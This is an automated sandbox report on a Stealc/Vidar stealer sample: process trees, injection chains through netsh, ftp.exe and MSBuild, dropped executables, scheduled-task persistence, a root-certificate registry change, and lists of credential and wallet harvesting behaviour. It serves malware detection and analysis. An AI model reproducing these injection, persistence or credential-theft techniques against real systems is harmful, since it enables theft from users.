Malware Analysis Report

2024-09-09 18:07

Sample ID 240618-r6fwdasdrr
Target 02cdfef8bcb577fb36ca108e6884b0ab7408d7f3ccacbedcaa5686fa636f138e.zip
SHA256 02cdfef8bcb577fb36ca108e6884b0ab7408d7f3ccacbedcaa5686fa636f138e
Tags
stealc vidar discovery persistence privilege_escalation spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

02cdfef8bcb577fb36ca108e6884b0ab7408d7f3ccacbedcaa5686fa636f138e

Threat Level: Known bad

The file 02cdfef8bcb577fb36ca108e6884b0ab7408d7f3ccacbedcaa5686fa636f138e.zip was found to be: Known bad.

Malicious Activity Summary

stealc vidar discovery persistence privilege_escalation spyware stealer

Stealc

Detect Vidar Stealer

Vidar

Reads user/profile data of web browsers

Reads data files stored by FTP clients

Reads user/profile data of local email clients

Accesses cryptocurrency files/wallets, possible credential harvesting

Downloads MZ/PE file

Checks computer location settings

Suspicious use of SetThreadContext

Checks installed software on the system

Drops file in Windows directory

Executes dropped EXE

Loads dropped DLL

Program crash

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Checks processor information in registry

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-18 14:48

Signatures

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

124s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vclx120.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1752 wrote to memory of 1216 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1752 wrote to memory of 1216 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1752 wrote to memory of 1216 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vclx120.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vclx120.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1216 -ip 1216

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4132,i,3144109701624127473,12586215149656995128,262144 --variations-seed-version --mojo-platform-channel-handle=2536 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
BE 88.221.83.248:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 248.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 3.166.122.92.in-addr.arpa udp
NL 52.111.243.29:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

memory/1216-0-0x0000000050310000-0x0000000050349000-memory.dmp

memory/1216-1-0x0000000050000000-0x0000000050116000-memory.dmp

memory/1216-2-0x0000000050120000-0x000000005030D000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

51s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\HDHelper_[0MB]_[1].exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\HDHelper_[0MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\HDHelper_[0MB]_[1].exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

109s

Max time network

148s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-processthreads-l1-1-1.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-processthreads-l1-1-1.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
BE 88.221.83.208:443 www.bing.com tcp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 208.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 43.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

93s

Max time network

99s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-synch-l1-2-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-synch-l1-2-0.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\maddisAsm_.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1876 wrote to memory of 2872 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1876 wrote to memory of 2872 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1876 wrote to memory of 2872 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\maddisAsm_.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\maddisAsm_.dll,#1

Network

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240221-en

Max time kernel

118s

Max time network

120s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\maddisAsm_.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2924 wrote to memory of 2948 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2924 wrote to memory of 2948 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2924 wrote to memory of 2948 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2924 wrote to memory of 2948 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2924 wrote to memory of 2948 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2924 wrote to memory of 2948 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2924 wrote to memory of 2948 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\maddisAsm_.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\maddisAsm_.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240508-en

Max time kernel

117s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 220

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20231129-en

Max time kernel

121s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\HDHelper_[0MB]_[1].exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\HDHelper_[0MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\HDHelper_[0MB]_[1].exe"

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

124s

Max time network

128s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madbasic_.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3772 wrote to memory of 3692 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3772 wrote to memory of 3692 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3772 wrote to memory of 3692 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madbasic_.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madbasic_.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4168,i,11069752405888604640,8928124405695604965,262144 --variations-seed-version --mojo-platform-channel-handle=4272 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
BE 2.17.107.105:443 www.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 105.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:51

Platform

win10v2004-20240226-en

Max time kernel

157s

Max time network

164s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe"

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Checks installed software on the system

discovery

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Watcher Com SH.job C:\Windows\SysWOW64\ftp.exe N/A
File created C:\Windows\Tasks\TWI Cloud Host.job C:\Windows\SysWOW64\ftp.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\DHDAKFCGIJ.exe N/A
N/A N/A C:\ProgramData\AFBAKKFCBF.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\ProgramData\DHDAKFCGIJ.exe N/A
N/A N/A C:\ProgramData\AFBAKKFCBF.exe N/A
N/A N/A C:\ProgramData\DHDAKFCGIJ.exe N/A
N/A N/A C:\ProgramData\DHDAKFCGIJ.exe N/A
N/A N/A C:\ProgramData\AFBAKKFCBF.exe N/A
N/A N/A C:\ProgramData\AFBAKKFCBF.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2144 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2144 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2144 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2144 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2612 wrote to memory of 4292 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2612 wrote to memory of 4292 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2612 wrote to memory of 4292 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2612 wrote to memory of 4292 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2612 wrote to memory of 4292 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 4292 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\DHDAKFCGIJ.exe
PID 4292 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\DHDAKFCGIJ.exe
PID 4292 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\DHDAKFCGIJ.exe
PID 4292 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AFBAKKFCBF.exe
PID 4292 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AFBAKKFCBF.exe
PID 4292 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AFBAKKFCBF.exe
PID 4704 wrote to memory of 3636 N/A C:\ProgramData\DHDAKFCGIJ.exe C:\Windows\SysWOW64\ftp.exe
PID 4704 wrote to memory of 3636 N/A C:\ProgramData\DHDAKFCGIJ.exe C:\Windows\SysWOW64\ftp.exe
PID 4704 wrote to memory of 3636 N/A C:\ProgramData\DHDAKFCGIJ.exe C:\Windows\SysWOW64\ftp.exe
PID 1280 wrote to memory of 4112 N/A C:\ProgramData\AFBAKKFCBF.exe C:\Windows\SysWOW64\ftp.exe
PID 1280 wrote to memory of 4112 N/A C:\ProgramData\AFBAKKFCBF.exe C:\Windows\SysWOW64\ftp.exe
PID 1280 wrote to memory of 4112 N/A C:\ProgramData\AFBAKKFCBF.exe C:\Windows\SysWOW64\ftp.exe
PID 4704 wrote to memory of 3636 N/A C:\ProgramData\DHDAKFCGIJ.exe C:\Windows\SysWOW64\ftp.exe
PID 1280 wrote to memory of 4112 N/A C:\ProgramData\AFBAKKFCBF.exe C:\Windows\SysWOW64\ftp.exe
PID 4112 wrote to memory of 4500 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4112 wrote to memory of 4500 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 3636 wrote to memory of 3720 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 3636 wrote to memory of 3720 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 3636 wrote to memory of 3720 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 4112 wrote to memory of 4500 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4112 wrote to memory of 4500 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
